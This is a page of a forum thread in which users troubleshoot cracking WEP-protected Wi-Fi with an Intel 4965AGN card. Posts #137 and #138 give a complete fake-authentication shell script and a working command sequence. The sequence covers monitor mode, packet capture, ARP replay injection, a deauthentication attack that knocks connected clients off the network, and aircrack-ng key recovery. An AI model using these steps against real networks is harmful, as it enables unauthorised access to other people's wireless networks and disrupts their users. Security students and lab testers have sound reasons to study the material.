Page 14 of 15 FirstFirst ... 412131415 LastLast
Results 131 to 140 of 145

Thread: 4965 agn

  1. #131
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2

    Default

    nightmare44@pooptown:~$ sudo ./fakeit
    NetworkManager: no process killed
    knetworkmanager: no process killed




    Enter the SSID of the Target Network:
    Tiger Woods
    Starting Fake Authentication with Tiger Woods
    Line 1: Invalid configuration line 'network={ \n ssid="Tiger Woods" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }'.
    Failed to read or parse configuration '/home/nightmare44/fake.conf'.


    What is causing this invalid config line? I realize it's the wpa supplicant portion of the fake shell script but why am I getting this return?

  2. #132
    Member alacrityathome's Avatar
    Join Date
    Jan 2010
    Posts
    248

    Default

    nightmare,

    many Distros do not recognize the \n command. Go into the script and adjust it so that, for example, 'network={ \n ssid="Tiger Woods"

    appears as:

    'network={
    ssid="Tiger Woods"


    and so on....wherever there is a \n

    Have fun.

    A

  3. #133
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2

    Default

    Hey alaracity im getting the same thing. Here is the line from my fakeit:

    echo 'network={ssid="'$SEL'" key_mgmt=NONE wep_key0="fakeauth"}' > fake.conf

    fwiw i'm running BT4 pre-final

  4. #134
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    1

    Default

    Please,
    how to add "konsole -e airodump-ng wlan0" command line in sh file-script for view and copy SSID, BSSID, CHANNEL on target Wireless (after CTRL+C new konsole window automatically close)???

    Thanks

  5. #135
    socks5
    Guest

    Default

    does this work with bt3 ??

    if yes then how..where am i suppose to put he script at idk...

  6. #136
    Member alacrityathome's Avatar
    Join Date
    Jan 2010
    Posts
    248

    Default

    socks5,

    I see no reason why it wouldn't work with BT3.....as long as you had all the supporting software/programs (perl, ReadKey, Expect, and so on).

    Put the script anywhere....

    Have fun.

    A

  7. #137
    Member mixit's Avatar
    Join Date
    Jan 2010
    Posts
    104

    Post

    I just wanted to post my success and what steps i followed to achieve it, because i know that many people have had problems with this (including me until about 2 hours ago).

    I am using Backtrack 4 Pre Final straight "out of the box". No mods to drivers, aircrack suite, etc...

    First, I created the fakeit script posted earlier in this thread. Simply copy and paste this code into your favorite text editor, and save it as fakeit.sh in the root folder


    Code:
    #!/bin/sh
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo ""
    echo "Enter the ESSID of the Target Network: (use last)"
    read SEL
    if [ "$SEL" != "" ]
    then
    echo ""
    if [ -e fake.conf ]; then
    echo "Deleting old fake.conf"
    rm fake.conf
    fi
    echo 'network={
    ssid="'$SEL'"
    key_mgmt=NONE
    wep_key0="fakeauth"
    }' > fake.conf
    echo "Starting Fake Authentication with $SEL"
    
    else
    if ! [ -e fake.conf ]; then
    echo "ERROR - No config found, Provide ESSID"
    exit 1
    fi
    echo ""
    echo "Starting Fake Authentication with Previous ESSID"
    fi
    
    
    echo ""
    echo "How many times do you want to fake it? (30):"
    read TIMES
    if [ "$TIMES" = "" ]; then TIMES=30; fi
    
    
    echo ""
    echo "How many seconds between restarts? (45):"
    read SEC
    if [ "$SEC" = "" ]; then SEC=45; fi
    
    i=1
    while [ $i -le $TIMES ]
    do
    wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
    echo ""
    echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
    i=`expr $i + 1`
    if [ $i -le $TIMES ]; then
    echo "Reconnecting in $SEC seconds"
    sleep $SEC
    echo "Faking orgasam again... uh! ah! That's the spot!"
    fi
    done
    I have already taken out the \n characters for you, so there should be no problems with that.

    Next,
    Code:
    airmon-ng start wlan0
    airodump-ng mon0
    Note the bssid, channel, and essid of the network

    Stop airodump with Ctrl-C
    Restart airodump on the correct channel with
    Code:
    airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
    Leave that running and open a new terminal. Start the fakeit script with
    Code:
    sh fakeit.sh
    Answer what it asks for. The main thing is to include the essid of your AP. The rest you can probably just press enter for each question and use the default values.

    If all goes well, you'll get a message that says
    Code:
    Fake Auth Connection (1 of 30) Success ...maybe check airodump-ng to be sure.
    Reconnecting in 45 seconds
    Faking orgasam again... uh! ah! That's the spot!
    Great, now you're associated with the AP and you should be able to replay ARP packets.

    Open a third terminal and start injection with
    Code:
    aireplay-ng -3 -b 'bssid' mon0
    Soon after, if you capture any ARP requests, you'll be able to replay these and the #Data should increase quickly.

    I have not been successful without having another client connected to the network. If there is a client connected and you want to force them to send an ARP request (if you're impatient like me), you can open a fourth terminal and use
    Code:
    aireplay-ng -0 1 -a 'AP bssid' mon0
    This will deauthenticate them and force them to reauthenticate producing an ARP request and the the injection started more quickly.

    Hopefully this will help someone. Please dont be too harsh, this was my first post here.

    On a side note, is it possible to inject WITHOUT a client already connected to the network?

    And, while it seems unimportant, because i was able to crack my WEP key, I never collect any ACK packets. It remains at 0 during this entire process. I have tried generating ACK packets on the network by connecting multiple clients to the network while im attacking. Obviously there are ACK packets on the network since the client connects and the handshake is completed. Can anyone come up with a reason for this?

  8. #138
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    14

    Lightbulb My Intel 4965AGN success story

    it worked finally!!

    I"v tried a lot of different ways, today finally a solution.
    I was able to crack my capture arp's and crack my WEP in under 2min's!

    This is what I did:

    /dev/init.d/networking start

    startx

    airmon-ng start wlan0
    airodump-ng mon0
    ctrl+c
    airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
    make a file in the root (destkop) fake.conf:

    network={
    ssid="SSID" <-- change this in your target ssid
    key_mgmt=NONE
    wep_key0="fakeauth"
    }

    wpa_supplicant -c fake.conf -i wlan0 -Dwext -B

    aireplay-ng -3 -b 'AP bssid' mon0
    aireplay-ng -0 1 -a 'AP bssid' mon0


    aircrack-ng -b BSSID capfile-01.cap
    DONE

  9. #139
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    6

    Default

    which is the guide of 4965 for WEP cracking with BT4 PRE FINAL?

  10. #140
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    3

    Default MixIt your script gives me an error

    Hi everybody.

    MixIt,
    I tried to follow your guide step by step: it didn't seem difficult.

    However, when I run the script and insert the ESSID I get the following errors:

    'not a valid identifier`SEL
    fakeit.sh: line 56: syntax error near unexpected token `done'
    fakeit.sh: line 56: `done'

    I simply copied and pasted the script from your post.
    I am a linux analphabet, so if there is even an obvious typo I cannot detect it.

    On the other hand, even as analphabet as I am, I can't imagine anything I may be doing wrong causing a copy-pasted script not to work; I'm running the latest prerelease 4 live out-of-the-box as you you did.

    Would you please help me?

    Thanks in advance
    m.

    P.S. it showed also another error before asking the essid:
    after 3 "no process killed" which I guess are OK, it said:
    : command not foundclear

Page 14 of 15 FirstFirst ... 412131415 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •